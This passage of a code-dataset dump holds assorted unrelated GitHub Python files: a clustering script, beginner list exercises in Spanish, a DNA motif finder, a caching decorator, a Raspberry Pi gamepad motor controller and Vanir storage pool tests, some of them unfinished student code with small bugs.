silhouette_temp]) # 将每次k值以及平均轮廓系数记录保存\n\nprint(score_list)\nprint('最优的k值是:{0}\\n对应的轮廓系数是{1}'.format(best_k, silhouette_init))\n\ncluster_labels = pd.DataFrame(cluster_labels_k, columns=['clusters'])\nIFL.reset_index(inplace=True)\nmerge_data = pd.concat((IFL, cluster_labels), axis=1)\n\n# %%\n# #计算各个聚类类别内部最显著的特征值\ncluster_features = []\nfor i in range(best_k):\n label_data = merge_data[merge_data['clusters'] == i].iloc[:, 1:4]\n desc_data = label_data.describe().round(3)\n mean_data = desc_data.iloc[1, :]\n mean_data.name = i\n cluster_features.append(mean_data)\n\ncluster_pd = pd.DataFrame(cluster_features)\ncluster_ct = pd.DataFrame(merge_data['clusters'].value_counts())\ncluster_ct.rename(columns={'clusters': 'count'}, inplace=True)\ncluster_ct['ratio'] = cluster_ct / sum(cluster_ct['count'])\nall_cluster_set = pd.concat((cluster_pd, cluster_ct), axis=1)\n\nc_schema = [\n {'name': 'I', 'max': 1, 'min': 0},\n {'name': 'F', 'max': 1, 'min': 0},\n {'name': 'L', 'max': 1, 'min': 0},\n]\n\n# radar = (\n# Radar()\n# .add_schema(schema=c_schema)\n# .add('0分组', [all_cluster.iloc[0, :].to_list()])\n# .add('1分组', [all_cluster.iloc[1, :].to_list()])\n# .add('2分组', [all_cluster.iloc[2, :].to_list()])\n# )\n# radar.render()\\\n\nall_cluster_set.iloc[:, :3].mean()\n","repo_name":"leepeiforx/PycharmProjects","sub_path":"数据分析项目/bilibili.py","file_name":"bilibili.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15854329912","text":"#1) Meter los números del 1 al 20 en una lista y mostrarla en pantalla. Hacer lo mismo\n# para un rango de números indicado por un usuario. \nlista=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\nmostrar=len(lista)\nfor rango in range(mostrar):\n print(lista[rango])\n\nnumero=int(input(\"ingresa cuantos numeros quieres que se impriman en pantala:\"))\nlista=[]\nfor rango in range(numero+1):\n lista.append(rango)\n print(lista[rango])\n\n#2) Pide un número y guarda en una lista su tabla de multiplicar hasta el 10. 
Por\n#ejemplo, si pide el 5 la lista tendrá: 5,10,15,20,25,30,35,40,45,50 \nnumero=int(input(\"Ingrese el numero que desea saber su tabla de multiplicar:\"))\nlista=[]\nlista.append(numero)\nguardado=0\nfor rango in range(1,10+1):\n guardado+=numero\n lista.append(guardado)\n print(lista[rango])\n#3) Pide una cadena (string) por teclado, mete los caracteres en una lista sin repetir\n#caracteres.\npalabra=input(\"Que palabra desea ingresar en la lista?:\")\ncontador=len(palabra)\nlista=[]\nfor rango in range(contador):\n lista.append(palabra[rango])\nprint(lista)\n#4) Pide una cadena (string) por teclado, mete los caracteres en una lista sin espacios. \npalabra=input(\"Que palabra desea ingresar en la lista?:\")\ncontador=len(palabra)\ncontador2=-1\nlista=[]\nfor rango in range(contador):\n lista.append(palabra[rango])\n contador2+=1\n if lista[contador2]==\" \":\n lista.remove(\" \")\n contador2-=1\nprint(lista)\n#5) Crea una tupla con números, pide un numero por teclado e indica cuantas veces se\n#repite.\nnumero=int(input(\"Que numero deseas saber cuantas veces se repite en la tupla?:\"))\ntupla=(1,2,4,32,31,4,2,12,43,2,6)\ncontador=len(tupla)\nveces=0\nfor rango in range(contador):\n if numero==tupla[rango]:\n veces+=1\nprint(f\"El numero {numero} en la tupla aparece {veces}\")\n#6) Crea una tupla con los meses del año, pedir números al usuario. Si el numero esta\n#entre 1 y la longitud máxima de la tupla, muestra el contenido de esa posición sino\n#muestra un mensaje de error. El programa termina cuando el usuario introduce un\n#cero\ntupla=(\"El programa termino\",\"enero\",\"febrero\",\"marzo\",\"abril\",\"mayo\",\"junio\",\"julio\",\"agosto\",\"septiembre\",\"octubre\",\"noviembre\",\"diciembre\")\ncontador=len(tupla)\nwhile True:\n numero=int(input(\"Ingrese un numero:\"))\n if numero > 0 and numero < contador:\n print(tupla[numero])\n elif numero == 0:\n print(tupla[numero])\n break\n elif numero < 0 or numero >= 13:\n print(\"El numero ingresado no es valido\")\n#7) Crea una tupla con números e indica el número con mayor valor y el que menor\n#tenga.\ntupla=(1,2,5,2,8,66,7,0)\ncontador=len(tupla)\nmayor=tupla[0]\nmenor=tupla[0]\nfor rango in range(contador):\n if mayor < tupla[rango]:\n mayor=tupla[rango]\n if menor > tupla[rango]:\n menor=tupla[rango]\nprint(f\"el mayor numero es {mayor}\")\nprint(f\"el menor numero es {menor}\")\n\n#9) Opcional: Pide números y mételos en una lista, cuando el usuario meta un 0 ya\n#dejaremos de insertar. 
Por último, muestra los números ordenados de menor a\n#mayor.\nlista=[]\nwhile True:\n numeros=int(input(\"Ingrese un numero:\"))\n lista.append(numeros)\n if numeros == 0:\n break\ncontador=len(lista)\nfor rango in range(contador):\n menor=lista[0]\n for rango2 in range(contador):\n if menor < lista[rango2]:\n menor=menor\n elif menor > lista[rango2]:\n menor=lista[rango2]\n rango2=0\n contador=contador-1\n print(menor)\n lista.remove(menor)\n\n","repo_name":"PabloCordob/Phyton","sub_path":"IITA_TP3.py","file_name":"IITA_TP3.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"33812430815","text":"import sys\nfiledata = open(sys.argv[1]).read().split()\ntext = filedata[0]\npattern = filedata[1]\n\ndef findpos(text,pattern):\n #find all positions of pattern in text\n \n pfind = text.find(pattern)\n pos = [pfind]\n ind=0\n while pfind >=0:\n subtext = text[pos[ind]+1:]\n pfind = subtext.find(pattern)\n pos.append(pfind+pos[ind]+1)\n ind=ind+1\n output = []\n for val in pos:\n output.append(val+1)\n \n return sorted(list(set(output)))\n\n\noutput = findpos(text,pattern) \nfh = open('findmotif_ANS.txt','w')\nfh.write(' '.join(map(str,output)))\nfh.close()\n\nimport webbrowser\nwebbrowser.open('motifANS.txt')\n","repo_name":"ao508/RosalindSolutions","sub_path":"patternmatch.py","file_name":"patternmatch.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"22532634202","text":"class CachedFunction:\n\n def __init__(self, function):\n self.function = function\n self.cache = {}\n\n def __call__(self, *args, **kwargs):\n if args in self.cache:\n return self.cache[args]\n result = self.function(*args, **kwargs)\n self.cache[args] = result\n return result\n\n\n\n\n\n\n\n@CachedFunction\ndef slow_fibonacci(n):\n if n == 1:\n return 0\n elif n in (2, 3):\n return 1\n return slow_fibonacci(n - 1) + slow_fibonacci(n - 2)\n\n\nprint(slow_fibonacci(100))\n\n","repo_name":"DAlavaro/stepik_oop","sub_path":"5.6 tasks/step_16_@CachedFunction.py","file_name":"step_16_@CachedFunction.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7992530534","text":"from itertools import chain, combinations\nimport permutation as perm\n\nclass SYMMETRICGROUP(object):\n\n def __init__(self, order):\n self.order = order\n self.sn = self.getObject()\n\n def __repr__(self):\n return str(self.sn).replace(\"[\",\"{\").replace(\"]\",\"}\")\n \n def getObject(self):\n s = list(range(1, self.order+1))\n withSingletons = list(chain.from_iterable(combinations(s,r) for r in range(len(s)+1)))\n removeSingletons = list(filter(lambda k: len(list(k)) > 1, withSingletons))\n\n return [tuple([1])]+removeSingletons\n \n def generate(self):\n permutations = [tuple([i,j]) for j in range(1,self.order+1) for i in range(1, self.order+1)]\n withoutSingletons = list(filter(lambda p: p[0] != p[1], permutations))\n transitions = list(set(list(map(lambda p: tuple([min(p), max(p)]), withoutSingletons))))\n\n p = perm.PERMUTATION((2,3))\n q = perm.PERMUTATION((1,2))\n print(str(q)+str(p), \"=\", q.compose(p))\n\n return list(set(transitions+[perm.PERMUTATION(p).compose(perm.PERMUTATION(q)) for q in transitions for p in 
transitions]))\n","repo_name":"alecaines/RepresentationTheory","sub_path":"computation-m1/symmgroup.py","file_name":"symmgroup.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"37275805817","text":"from evdev import InputDevice, categorize, ecodes\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\n#creates object 'gamepad' to store the data\n#you can call it whatever you like\ngamepad = InputDevice('/dev/input/event0')\n\n#button code variables (change to suit your device)\npin3=3 #boton1, motor1\npin5=5 #boton2, motor1\n\npin11=11 #boton3, motor2\npin13=13 #boton4, motor2\n\npin19=19 #botonR1,motor3\npin21=21 #botonR2,motor3\n\npin29=29 #botonL1,motor4\npin31=31 #botonL2,motor4\n\nen=23 #pwm motor2\nen2=16\nen3=18\n\nGPIO.setup(en,GPIO.OUT)\nGPIO.setup(en2,GPIO.OUT)\nGPIO.setup(en3,GPIO.OUT)\nGPIO.setup(pin5, GPIO.OUT)\nGPIO.setup(pin3, GPIO.OUT)\nGPIO.setup(pin11, GPIO.OUT)\nGPIO.setup(pin13, GPIO.OUT)\nGPIO.setup(pin19, GPIO.OUT)\nGPIO.setup(pin21, GPIO.OUT)\nGPIO.setup(pin29, GPIO.OUT)\nGPIO.setup(pin31, GPIO.OUT)\np=GPIO.PWM(en,1000)\np2=GPIO.PWM(en2,1000)\np3=GPIO.PWM(en3,1000)\n\n\n\nbtn1 = 288\nbtn2 = 289\nbtn3 = 290\nbtn4 = 291\nbtnR1 = 293\nbtnR2 = 295\nbtnL1 = 292\nbtnL2 = 294\np.start(100)\np2.start(100)\np3.start(100)\n\n#prints out device info at start\nprint(gamepad)\n\n#loop and filter by event code and print the mapped label\nfor event in gamepad.read_loop():\n if event.type == ecodes.EV_KEY:\n if event.value == 1:\n \n if event.code == btn1:\n print(\"Presionaste 1\")\n GPIO.output(pin3, GPIO.HIGH)\n \n elif event.code == btn2:\n GPIO.output(pin5, GPIO.HIGH)\n print(\"Presionaste 2\")\n \n elif event.code == btn3:\n print(\"Presionaste 3\")\n p.ChangeDutyCycle(100)\n GPIO.output(pin11, GPIO.HIGH)\n \n elif event.code == btn4:\n print(\"Presionaste 4\") \n p.ChangeDutyCycle(100)\n GPIO.output(pin13, GPIO.HIGH)\n \n \n elif event.code == btnR1:\n print(\"Presionaste R1\")\n GPIO.output(pin19, GPIO.HIGH)\n GPIO.output(pin29, GPIO.HIGH)\n \n elif event.code == btnR2:\n print(\"Presionaste R2\") \n GPIO.output(pin21, GPIO.HIGH)\n GPIO.output(pin31, GPIO.HIGH)\n \n elif event.code == btnL1:\n print(\"Presionaste L1\")\n p2.ChangeDutyCycle(99.85)\n p3.ChangeDutyCycle(100)\n GPIO.output(pin29, GPIO.HIGH)\n GPIO.output(pin21, GPIO.HIGH)\n \n elif event.code == btnL2:\n print(\"Presionaste L2\") \n p2.ChangeDutyCycle(99.93)\n p3.ChangeDutyCycle(100)\n GPIO.output(pin31, GPIO.HIGH)\n GPIO.output(pin19, GPIO.HIGH)\n \n if event.value == 0:\n \n if event.code == btn1:\n print(\"soltaste 1\")\n GPIO.output(pin3, GPIO.LOW)\n \n elif event.code == btn2:\n print(\"soltaste 2\") \n GPIO.output(pin5, GPIO.LOW)\n \n elif event.code == btn3:\n print(\"soltaste 3\")\n p.ChangeDutyCycle(20)\n GPIO.output(pin11, GPIO.LOW)\n GPIO.output(pin13, GPIO.HIGH)\n \n elif event.code == btn4:\n print(\"soltaste 4\")\n p.ChangeDutyCycle(20) \n GPIO.output(pin11, GPIO.LOW)\n GPIO.output(pin13, GPIO.HIGH)\n \n elif event.code == btnR1:\n print(\"soltaste R1\")\n GPIO.output(pin19, GPIO.LOW)\n GPIO.output(pin29, GPIO.LOW)\n \n elif event.code == btnR2:\n print(\"soltaste R2\") \n GPIO.output(pin21, GPIO.LOW)\n GPIO.output(pin31, GPIO.LOW)\n \n elif event.code == btnL1:\n print(\"soltaste L1\")\n GPIO.output(pin29, GPIO.LOW)\n GPIO.output(pin21, GPIO.LOW)\n \n elif event.code == btnL2:\n GPIO.output(pin31, GPIO.LOW)\n GPIO.output(pin19, GPIO.LOW)\n print(\"soltaste L2\")\n \n 
\n","repo_name":"emanuel99r/rpi","sub_path":"RASPI CODES/motor_mando.py","file_name":"motor_mando.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12562845832","text":"# 다른사람 풀이를 참조하자!\n\ndef solution(name):\n n = len(name)\n combo = False\n combo_n = 0\n max_combo_n = 0\n for a in name:\n if a == 'A':\n combo = True\n combo_n += 1\n elif combo: # 콤보가 깨졌다면\n combo = False\n max_combo_n = max(combo_n, max_combo_n)\n combo_n = 0\n # l_combo = r_combo = 0\n # for i in range(1, n): # 두번째부터 끝까지\n # if name[i] != 'A':\n # break\n # r_combo += 1\n\n # for i in range(n-1, 0, -1): # 마지막부터 두번째까지\n # if name[i] != 'A':\n # break\n # l_combo += 1\n\n answer = n - 1 - max(l_combo, r_combo)\n for a in name:\n dist = abs(ord(a) - ord('A'))\n answer += min(dist, 26-dist)\n return answer\n\n\n# BBAAAAAAAAAAAAAAAAABB -> 이런경우가 예외겠구나!\n","repo_name":"skku-algostudy/algostudy-python","sub_path":"week3/준우/PG#42860 - 조이스틱/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"14303851415","text":"import shutil\r\nimport unittest.mock\r\nimport vanir.log\r\nimport vanir.storage\r\nfrom vanir.exc import VanirException\r\nfrom vanir.storage import pool_drivers\r\nfrom vanir.storage.file import FilePool\r\nfrom vanir.storage.reflink import ReflinkPool\r\nfrom vanir.tests import SystemTestCase, VanirTestCase\r\n\r\n# :pylint: disable=invalid-name\r\n\r\n\r\nclass TestPool(unittest.mock.Mock):\r\n def __init__(self, *args, **kwargs):\r\n super(TestPool, self).__init__(*args, spec=vanir.storage.Pool, **kwargs)\r\n try:\r\n self.name = kwargs['name']\r\n except KeyError:\r\n pass\r\n\r\n def __str__(self):\r\n return 'test'\r\n\r\n def init_volume(self, vm, volume_config):\r\n vol = unittest.mock.Mock(spec=vanir.storage.Volume)\r\n vol.configure_mock(**volume_config)\r\n vol.pool = self\r\n vol.import_data.return_value = '/tmp/test-' + vm.name\r\n return vol\r\n\r\n\r\nclass TestVM(object):\r\n def __init__(self, test, template=None):\r\n self.app = test.app\r\n self.name = test.make_vm_name('appvm')\r\n self.dir_path = '/var/lib/vanir/appvms/' + self.name\r\n self.log = vanir.log.get_vm_logger(self.name)\r\n\r\n if template:\r\n self.template = template\r\n\r\n def is_template(self):\r\n # :pylint: disable=no-self-use\r\n return False\r\n\r\n def is_disposablevm(self):\r\n # :pylint: disable=no-self-use\r\n return False\r\n\r\n\r\nclass TestTemplateVM(TestVM):\r\n dir_path_prefix = vanir.config.system_path['vanir_templates_dir']\r\n\r\n def __init__(self, test, template=None):\r\n super(TestTemplateVM, self).__init__(test, template)\r\n self.dir_path = '/var/lib/vanir/vm-templates/' + self.name\r\n\r\n def is_template(self):\r\n return True\r\n\r\n\r\nclass TestDisposableVM(TestVM):\r\n def is_disposablevm(self):\r\n return True\r\n\r\nclass TestApp(vanir.Vanir):\r\n def __init__(self, *args, **kwargs): # pylint: disable=unused-argument\r\n super(TestApp, self).__init__('/tmp/vanir-test.xml',\r\n load=False, offline_mode=True, **kwargs)\r\n self.load_initial_values()\r\n self.default_pool = self.pools['varlibqubes']\r\n\r\nclass TC_00_Pool(VanirTestCase):\r\n \"\"\" This class tests the utility methods from :mod:``vanir.storage`` \"\"\"\r\n\r\n def setUp(self):\r\n super(TC_00_Pool, self).setUp()\r\n self.basedir_patch = unittest.mock.patch('vanir.config.vanir_base_dir',\r\n 
        self.basedir_patch = unittest.mock.patch('vanir.config.vanir_base_dir',\r\n            '/tmp/vanir-test-basedir')\r\n        self.basedir_patch.start()\r\n        self.app = TestApp()\r\n\r\n    def tearDown(self):\r\n        self.basedir_patch.stop()\r\n        self.app.close()\r\n        del self.app\r\n        shutil.rmtree('/tmp/vanir-test-basedir', ignore_errors=True)\r\n        super().tearDown()\r\n\r\n    def test_000_unknown_pool_driver(self):\r\n        # :pylint: disable=protected-access\r\n        \"\"\" Expect an exception when an unknown pool is requested \"\"\"\r\n        with self.assertRaises(VanirException):\r\n            self.app.get_pool('foo-bar')\r\n\r\n    def test_001_all_pool_drivers(self):\r\n        \"\"\" Expect all our pool drivers (and only them) \"\"\"\r\n        self.assertCountEqual(\r\n            ['linux-kernel', 'lvm_thin', 'file', 'file-reflink'],\r\n            pool_drivers())\r\n\r\n    def test_002_get_pool_klass(self):\r\n        \"\"\" Expect the default pool to be `FilePool` or `ReflinkPool` \"\"\"\r\n        # :pylint: disable=protected-access\r\n        result = self.app.get_pool('varlibqubes')\r\n        self.assertTrue(isinstance(result, FilePool)\r\n                        or isinstance(result, ReflinkPool))\r\n\r\n    def test_003_pool_exists_default(self):\r\n        \"\"\" Expect the default pool to exist \"\"\"\r\n        self.assertPoolExists('varlibqubes')\r\n\r\n    def test_004_add_remove_pool(self):\r\n        \"\"\" Tries adding and removing a pool. \"\"\"\r\n        pool_name = 'asdjhrp89132'\r\n\r\n        # make sure it really does not exist\r\n        self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n        self.assertFalse(self.assertPoolExists(pool_name))\r\n\r\n        self.loop.run_until_complete(\r\n            self.app.add_pool(name=pool_name,\r\n                              driver='file',\r\n                              dir_path='/tmp/asdjhrp89132'))\r\n        self.assertTrue(self.assertPoolExists(pool_name))\r\n\r\n        self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n        self.assertFalse(self.assertPoolExists(pool_name))\r\n\r\n    def assertPoolExists(self, pool):\r\n        \"\"\" Check if the specified pool exists \"\"\"\r\n        return pool in self.app.pools.keys()\r\n\r\n    def test_005_remove_used(self):\r\n        pool_name = 'test-pool-asdf'\r\n\r\n        dir_path = '/tmp/{}'.format(pool_name)\r\n        pool = self.loop.run_until_complete(\r\n            self.app.add_pool(name=pool_name,\r\n                              driver='file',\r\n                              dir_path=dir_path))\r\n        self.addCleanup(shutil.rmtree, dir_path)\r\n        vm = self.app.add_new_vm('StandaloneVM', label='red',\r\n                                 name=self.make_vm_name('vm'))\r\n        self.loop.run_until_complete(vm.create_on_disk(pool=pool))\r\n        with self.assertRaises(vanir.exc.VanirPoolInUseError):\r\n            self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n","repo_name":"VanirLab/VOS","sub_path":"vanir/tests/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"25288457571","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom rls_assimilation.RLSAssimilation import RLSAssimilation\nfrom rls_assimilation.SequentialRLSAssimilation import (\n    SequentialRLSAssimilationOneSource,\n    SequentialRLSAssimilationTwoSources,\n)\nfrom helpers import (\n    plot_data_seq,\n    print_metrics_seq,\n    get_rmse,\n    print_stats_from_array,\n    read_data,\n    prepare_daily_data,\n)\n\n\nnp.seterr(all=\"raise\")\n\n\ndef run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out):\n    is_multi_t = t_in1 != t_out or t_in2 != t_out  # multi-temporal data assimilation\n    is_one_seq_source = not is_multi_t\n\n    assimilator = RLSAssimilation(\n        t_in1=t_in1,\n        t_in2=t_in2,\n        s_in1=s_in1,\n        s_in2=s_in2,\n        t_out=t_out,\n        s_out=s_out,\n    )\n    if is_one_seq_source:\n        seq_assimilator = 
SequentialRLSAssimilationOneSource()\n else:\n seq_assimilator = SequentialRLSAssimilationTwoSources(\n t_in1=t_in1,\n t_in2=t_in2,\n s_in1=s_in1,\n s_in2=s_in2,\n t_out=t_out,\n s_out=s_out,\n )\n\n if is_one_seq_source:\n source1_col = f\"{variable}\"\n source2_col = f\"{variable}_model\"\n seq_source_col = source1_col if s_out == s_in1 else source2_col\n else:\n source1_col = f\"{variable}_{s_in1}_{t_in1}\"\n source2_col = f\"{variable}_{s_in2}_{t_in2}\"\n seq_source_col = None\n\n assimilated = []\n err_assimilated = []\n seq_assimilated = []\n seq_err_assimilated = []\n\n for k in range(len(df)):\n # Step 1: Obtain raw observations from 2 sources\n latest_observation_source1 = df[source1_col].values[k]\n latest_observation_source2 = df[source2_col].values[k]\n\n # Step 2: Assimilate\n analysis, err_analysis = assimilator.assimilate(\n latest_observation_source1,\n latest_observation_source2,\n )\n assimilated.append(analysis)\n err_assimilated.append(err_analysis)\n\n if is_one_seq_source:\n latest_observation_source = df[seq_source_col][k]\n seq_analysis, seq_err_analysis = seq_assimilator.assimilate(\n latest_observation_source\n )\n else:\n seq_analysis, seq_err_analysis = seq_assimilator.assimilate(\n latest_observation_source1,\n latest_observation_source2,\n )\n\n seq_assimilated.append(seq_analysis)\n seq_err_assimilated.append(seq_err_analysis)\n\n df[\"Assimilated\"] = assimilated\n df[\"Seq_Assimilated\"] = seq_assimilated\n df = df.dropna()\n\n # Step 3: Get metrics\n # Uncertainties\n mean_unc_da = np.mean(err_assimilated)\n mean_unc_seq = np.mean(seq_err_assimilated)\n\n # Get a ratio of mean uncertainties for DA and sequential DA\n try:\n err_seq_da_ratio = mean_unc_seq / mean_unc_da\n except (ZeroDivisionError, FloatingPointError):\n err_seq_da_ratio = 1\n\n # RMSE between values\n if seq_source_col:\n rmse_seq = get_rmse(\n df[\"Seq_Assimilated\"].values,\n df[seq_source_col].values,\n )\n rmse_da = get_rmse(\n df[f\"Assimilated\"].values,\n df[seq_source_col].values,\n )\n try:\n seq_da_ratio = rmse_seq / rmse_da\n except (ZeroDivisionError, FloatingPointError):\n seq_da_ratio = 1\n\n return (\n seq_da_ratio,\n None,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n )\n\n # Compare errors of assimilated from actual hourly reference\n rmse_da_h = get_rmse(\n df[\"Assimilated\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n rmse_seq_h = get_rmse(\n df[\"Seq_Assimilated\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n rmse_dh = get_rmse(\n df[f\"{variable}_{s_out}_daily\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n\n try:\n da_dh_ratio = rmse_da_h / rmse_dh\n except (ZeroDivisionError, FloatingPointError):\n da_dh_ratio = 1\n\n try:\n seq_dh_ratio = rmse_seq_h / rmse_dh\n except (ZeroDivisionError, FloatingPointError):\n seq_dh_ratio = 1\n\n return (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n )\n\n\ndef get_location_by_variable(variable):\n if variable in [\"CO\", \"SO2\"]:\n return \"Madrid (Spain)\"\n if variable in [\"NO2\", \"O3\"]:\n return \"Peristeri (Athens, Greece)\"\n if variable in [\"PM2.5\", \"PM10\"]:\n return \"Paris (France)\"\n\n return \"\"\n\n\ndef test_single_dataset(\n data_path, output_path, get_location_name, t_in1, t_in2, s_in1, s_in2, t_out, s_out\n):\n plotted_n_hours = 168\n\n is_multi_t = t_in1 != t_out or t_in2 != t_out\n\n variables = [\"CO\", \"NO2\", \"PM2.5\", \"SO2\", \"O3\", \"PM10\"]\n\n fig_data, axs_data = 
plt.subplots(nrows=3, ncols=2, figsize=(25, 25))\n\n for idx, variable in enumerate(variables):\n print(variable)\n if not is_multi_t:\n df = read_data(data_path).iloc[:plotted_n_hours, :]\n (\n seq_da_ratio,\n _,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n else:\n df = prepare_daily_data(variable, data_path).iloc[:plotted_n_hours, :]\n (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n da_scenario = f\"DA{'3' if not is_multi_t else '4'} ({'Model' if s_out == s_in1 else 'Station'} -> {'Station' if s_out == s_in1 else 'Model'})\"\n seq_scenario = (\n f\"Sequential DA ({'Station' if s_in1 == s_out else 'Model'})\"\n if not is_multi_t\n else f\"Sequential DA4 ({'Model' if s_out == s_in1 else 'Station'} -> {'Station' if s_out == s_in1 else 'Model'})\"\n )\n\n if not is_multi_t:\n source1_col = f\"{variable}\"\n source2_col = f\"{variable}_model\"\n else:\n source1_col = f\"{variable}_{s_in1}_{t_in1}\"\n source2_col = f\"{variable}_{s_in2}_{t_in2}\"\n\n axs_data[idx % 3, idx % 2] = plot_data_seq(\n pd.Series(df[source1_col], index=df.index),\n pd.Series(df[source2_col], index=df.index),\n pd.Series(df[\"Assimilated\"], index=df.index),\n pd.Series(df[\"Seq_Assimilated\"], index=df.index),\n variable,\n axs_data[idx % 3, idx % 2],\n da_scenario,\n seq_scenario,\n get_location_name(variable),\n )\n\n print_metrics_seq(\n df[source1_col].values,\n df[source2_col].values,\n df[\"Assimilated\"].values,\n err_assimilated,\n df[\"Seq_Assimilated\"].values,\n seq_err_assimilated,\n da_scenario,\n seq_scenario,\n )\n\n scenario_id = f\"da{'3' if not is_multi_t else '4'}-{'1' if s_out == 'obs' else '2'}\"\n fig_data.savefig(f\"{output_path}/data-{scenario_id}.png\")\n\n\ndef test_variable_Europe_AQ(\n variable,\n t_in1,\n t_in2,\n s_in1,\n s_in2,\n t_out,\n s_out,\n):\n is_multi_t = t_in1 != t_out or t_in2 != t_out\n data_path_dir = f\"data/Europe_AQ/combined_{variable}\"\n unc_ratios = []\n\n if not is_multi_t:\n seq_da_ratios = []\n for filename in os.listdir(data_path_dir):\n df = read_data(f\"{data_path_dir}/{filename}\")\n (\n seq_da_ratio,\n _,\n err_seq_da_ratio,\n _,\n _,\n _,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n seq_da_ratios.append(seq_da_ratio)\n unc_ratios.append(err_seq_da_ratio)\n\n print_stats_from_array(seq_da_ratios, \"RMSE ratio (Sequential/Non-sequential)\")\n else:\n da_dh_ratios = []\n seq_dh_ratios = []\n for filename in os.listdir(data_path_dir):\n data_path = f\"{data_path_dir}/{filename}\"\n df = prepare_daily_data(variable, data_path)\n (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n _,\n _,\n _,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n da_dh_ratios.append(da_dh_ratio)\n seq_dh_ratios.append(seq_dh_ratio)\n unc_ratios.append(err_seq_da_ratio)\n\n print_stats_from_array(\n da_dh_ratios,\n \"RMSE ratio from hourly reference (Non-sequential assimilated / Daily reference)\",\n )\n print_stats_from_array(\n seq_dh_ratios,\n \"RMSE ratio from hourly reference (Sequential assimilated / Daily reference)\",\n )\n\n print_stats_from_array(unc_ratios, \"MAU ratio (Sequential/Non-Sequential)\")\n\n\ndef generate_tests(is_multi_t, s_out):\n s_in1 = \"obs\"\n s_in2 = \"model\"\n\n t_in1 = \"daily\" if is_multi_t and s_in1 == s_out else \"hourly\"\n t_in2 = \"daily\" if 
is_multi_t and s_in2 == s_out else \"hourly\"\n t_out = \"hourly\"\n\n print(\n f\"Scales: {'hourly' if not is_multi_t else 'daily to hourly'}, {'model to station' if s_out == 'obs' else 'station to model'}\"\n )\n\n # For Liivalaia (Tallinn, Estonia)\n # print('Liivalaia')\n # data_path = \"data/liivalaia_aq_meas_with_forecast.csv\"\n # get_location_name = lambda _: \"Liivalaia (Tallinn, Estonia)\"\n # test_single_dataset(data_path, 'plots/Liivalaia/Sequential/', get_location_name, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n # For Spain/Greece/Paris dataset use the following data path:\n print(\"Spain/Greece/Paris dataset\")\n data_path = \"data/eu-aq.csv\"\n get_location_name = lambda variable: get_location_by_variable(variable)\n test_single_dataset(\n data_path,\n \"plots/EU/Sequential/\",\n get_location_name,\n t_in1,\n t_in2,\n s_in1,\n s_in2,\n t_out,\n s_out,\n )\n\n # For Europe AQ dataset\n print(\"European AQ\")\n variables = [\"CO\", \"NO2\", \"O3\", \"SO2\", \"PM25\", \"PM10\"]\n for variable in variables:\n print(variable)\n test_variable_Europe_AQ(variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n\n# Test 1-source sequential VS 2-source non-sequential (the same temporal scales)\ngenerate_tests(False, \"obs\")\n# generate_tests(False, \"model\")\n\n# Test 2-source non-sequential VS 2-source sequential (different temporal scales)\n# generate_tests(True, \"obs\")\ngenerate_tests(True, \"model\")\n","repo_name":"effie-ms/rls-assimilation","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"19809664775","text":"'''\r\n@author: Ariz\r\n'''\r\nfrom datetime import datetime\r\nimport threading\r\nimport time\r\nimport sys, os\r\nfrom selenium import webdriver\r\n# from Utils.constants import *\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\nif sys.version_info[0] < 3:\r\n from Queue import Queue\r\nelse:\r\n from queue import Queue\r\nif not sys.version_info[0] < 3:\r\n import concurrent.futures\r\n\r\nclass snmpTrap(object):\r\n sleepInterval = 0.5\r\n implicitWait = 20\r\n serverConfig = 